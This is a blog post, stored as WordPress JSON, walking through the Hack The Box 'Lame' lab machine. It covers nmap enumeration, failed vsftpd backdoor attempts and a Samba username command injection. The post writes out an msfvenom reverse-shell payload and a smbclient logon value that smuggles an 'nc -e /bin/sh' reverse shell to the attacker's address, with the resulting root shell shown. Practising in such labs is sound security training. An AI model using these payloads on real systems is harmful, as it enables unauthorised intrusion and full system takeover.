{"id":120,"date":"2022-09-21T21:02:50","date_gmt":"2022-09-22T01:02:50","guid":{"rendered":"https:\/\/mikebabineau.me\/?p=120"},"modified":"2022-09-21T21:05:34","modified_gmt":"2022-09-22T01:05:34","slug":"htb-lame-machine-writeup","status":"publish","type":"post","link":"https:\/\/mikebabineau.me\/index.php\/2022\/09\/21\/htb-lame-machine-writeup\/","title":{"rendered":"HTB “lame” Machine Writeup"},"content":{"rendered":"

HTB “Lame” Writeup<\/h1>\n

This is my writeup for the Lame<\/em> machine in Hackthebox<\/p>\n

Enumeration<\/h1>\n

As usual, we will start with an nmap scan to see what we’re working with:<\/p>\n

nmap scan report for 10.10.10.3\nHost is up (0.035s latency).\nNot shown: 65530 filtered tcp ports (no-response)\nPORT     STATE SERVICE     VERSION\n21\/tcp   open  ftp         vsftpd 2.3.4\n|_ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to 10.10.14.2\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      vsFTPd 2.3.4 - secure, fast, stable\n|_End of status\n22\/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)\n| ssh-hostkey: \n|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)\n|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)\n139\/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n445\/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)\n3632\/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nHost script results:\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n|_smb2-time: Protocol negotiation failed (SMB2)\n| smb-os-discovery: \n|   OS: Unix (Samba 3.0.20-Debian)\n|   Computer name: lame\n|   NetBIOS computer name: \n|   Domain name: hackthebox.gr\n|   FQDN: lame.hackthebox.gr\n|_  System time: 2022-09-15T19:26:03-04:00\n|_clock-skew: mean: 2h00m22s, deviation: 2h49m45s, median: 20s\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 157.32 seconds<\/code><\/pre>\n
Looks like we’re working with a server hosting ftp as well as smb. No webserver! A change from the Starting Point machines.
\nLet’s start with some ftp fuzzing, since we have the version thanks to the nmap scripts: vsftp 2.3.4<\/strong><\/p>\n
FTP Fuzzing<\/h2>\n
Jumping into the ftp server as anonymous gives us nothing, looks empty. We also try the ftp<\/em> user our nmap scripts pulled for us, but the directory is also empty.<\/p>\n
Searching the web for exploits for vsftp 2.3.4<\/strong>, we see our friends at Rapid7 have created a metasploit module<\/a> for this. It looks like it exploits a malicious backdoor that was briefly in the specified version of vsftp. After setting the RHOST option for this exploit, we find it indeed doesn’t work.<\/p>\n
Searching a bit more, we find an exploit on exploitdb with a possible path to a shell<\/a>. Although it uses the same exploit, it may be worth trying. But it doesn’t work either.<\/p>\n
OK, maybe this box isn’t vulnerable to CVE-2011-2523<\/a>. Let’s create a payload using msf venom and see if we can upload it to the FTP server for future usage using this command:<\/p>\n
msfvenom -p linux\/x64\/shell_reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f elf > r.elf<\/code><\/p>\n
When we try to login to the ftp server as the ftp user and send the file using the put<\/code> command, it fails:
\n553 Could not create file.<\/code>
\nProbably this user doesn’t have permissions to upload files.<\/p>\n
Strange that the FTP seems to be open for no reason. Maybe we are missing something, or maybe it’s a red herring. Either way, let’s move onto some SMB exploitation.<\/p>\n
SMB Tricks<\/h2>\n
There are two open samba ports on the machine. Let’s focus on the one we have an exact version for, since this will make it easier to find an exploit. Some googling points us to a good candidate here<\/a>.<\/p>\n
To summarize, if we enter the username “\/=`nohup nc [SOMETHING], we can execute commands we input instead of SOMETHING.<\/p>\n
First, let’s start a netcat listener:<\/p>\n
$ sudo nc -nvlp 4444<\/code><\/pre>\n
Now let’s pass our payload as the username using smbclient<\/code>. The command ‘hangs’, which could indicate good news:<\/p>\n
$ smbclient \\\\10.10.10.3\\ -p=445 -U=\"\/=`nohup nc -e \/bin\/sh 10.10.14.9 4444`\"\nnohup: ignoring input and redirecting stderr to stdout\n<\/code><\/pre>\n
Note: smbclient<\/code> requires that every time you need one backslash, you actually need to put two. I think it’s related to escape characters. Hence the seemingly-excessive backslashes in the command. I learned this the hard way doing a starting point machine that required some SMB enumeration<\/em><\/p>\n
Let’s jump over to our netcat listener to see if it worked:<\/p>\n
listening on [any] 4444 ...\nconnect to [10.10.14.9] from (UNKNOWN) [10.10.14.9] 52988<\/code><\/pre>\n
Congratulations, we got a connection…
\n…from ourselves. Queue the DJ Khalid meme.<\/p>\n
A bit of googling reveals that our machine is actually executing the command inside the backticks as it reads the command, which explains the message we get regarding stderr<\/code> and stdout<\/code> after we execute.<\/p>\n
Let’s try using single quotes instead to pass it as a string so our machine doesn’t execute the command-in-a-command:<\/p>\n
$ smbclient \\\\10.10.10.3\\ -p=445 -U='\/=`nohup nc -e \/bin\/sh 10.10.14.9 4444`'\nPassword for [=`NOHUP NC -E bin\/sh 10.10.14.9 4444`]:\n<\/code><\/pre>\n
It works, sort of. We get a password prompt for the user from the SMB server. But reading through it we can see the capitalization is all messed up, and some of the slashes are incorrect.<\/p>\n
Doing some googling leads us to an interesting post on Stack Exchange<\/a> about this exploit, where they get it working by connecting to the SMB without logging in, and then passing the username a different way (it also implies there’s a metasploit module that can do this, but let’s do it ourselves instead):<\/p>\n
    \n
  1. First run smbclient -L<\/code> to get a list of shares<\/li>\n
  2. Then, pass the share to try like this:\n
    $ smbclient \/\/[ip]\/[share]<\/code><\/pre>\n<\/li>\n
  3. This gets you to the smb command line where you can use the logon<\/code> command to enter the payload properly.<\/li>\n<\/ol>\n
    Let’s give it a shot.<\/p>\n
    \u250c\u2500\u2500(kefka\u327fkali)-[~\/htb\/lame]\n\u2514\u2500$ smbclient -L 10.10.10.3                                                       \nPassword for [WORKGROUPkefka]:\nAnonymous login successful\n\n        Sharename       Type      Comment\n        ---------       ----      -------\n        print$          Disk      Printer Drivers\n        tmp             Disk      oh noes!\n        opt             Disk      \n        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))\n        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))\nReconnecting with SMB1 for workgroup listing.\nAnonymous login successful\n\n        Server               Comment\n        ---------            -------\n\n        Workgroup            Master\n        ---------            -------\n        WORKGROUP            LAME<\/code><\/pre>\n
    The tmp<\/code> share looks interesting…<\/p>\n
    \u250c\u2500\u2500(kefka\u327fkali)-[~\/htb\/lame]\n\u2514\u2500$ smbclient \/\/10.10.10.3\/tmp\nPassword for [WORKGROUPkefka]:\nAnonymous login successful\nTry \"help\" to get a list of possible commands.\nsmb: > logon\nlogon <username> [<password>]\nsmb: > logon \/=`nohup nc -e \/bin\/sh 10.10.14.9 4444`\nsession setup failed: NT_STATUS_LOGON_FAILURE\nsmb: > logon \"\/=`nohup nc -e \/bin\/sh 10.10.14.9 4444`\"\nPassword: \n<\/code><\/pre>\n
    My first attempt failed because I forgot to enclose the username in quotes. But the second one? Let’s take a look at our netcat listener…<\/p>\n
    \u250c\u2500\u2500(kefka\u327fkali)-[~]\n\u2514\u2500$ sudo nc -nvlp 4444\nlistening on [any] 4444 ...\nconnect to [10.10.14.9] from (UNKNOWN) [10.10.10.3] 49817\nwhoami\nroot\npython -c 'import pty; pty.spawn(\"\/bin\/bash\")'\nroot@lame:\/# <\/code><\/pre>\n
    BOOM! You can see here I invoke python to get a more stable shell as well.<\/p>\n
    We navigate to the root directory and see the root.txt<\/code> file, which contains our user flag.
    \nWe enter it in HTB and the machine isn’t marked as completed yet. There must be more flags!<\/p>\n
    We navigate to \/home\/<\/code> and find a few more users there but only one, the makis<\/code> user, has a flag. We submit that and get the matrix rating for the machine. Machine pwned!<\/p>\n
    \n
    Final Thoughts<\/h2>\n
    A great exercise in CVE enumeration based on version numbers. The vsftpd 2.3.4 vulnerability doesn’t work but in this instance, and I was curious why. Looking at this very excellent blog<\/a> gives some insight into that, it looks like the firewall is blocking the listener. They also get into an entirely different path to pwning this machine than what I found starting at the user level and escalating privileges! A great read.<\/p>\n
    That’s all for today, folks.<\/p>\n
    ~Kefka<\/p>\n","protected":false},"excerpt":{"rendered":"
    HTB “Lame” Writeup This is my writeup for the Lame machine in Hackthebox Enumeration As usual, we will start with an nmap scan to see what we’re working with: nmap scan report for 10.10.10.3 Host is up (0.035s latency). Not shown: 65530 filtered tcp ports (no-response) PORT STATE SERVICE VERSION […]<\/p>\n","protected":false},"author":2,"featured_media":122,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[9],"tags":[10,5,7,6,12],"class_list":["post-120","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-htb-writeups","tag-cyber","tag-ethicalhacking","tag-fun","tag-hackthebox-2","tag-writeup"],"aioseo_notices":[],"aioseo_head":"\n\t\t\n\t\n\t\n\t\n\t\n\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t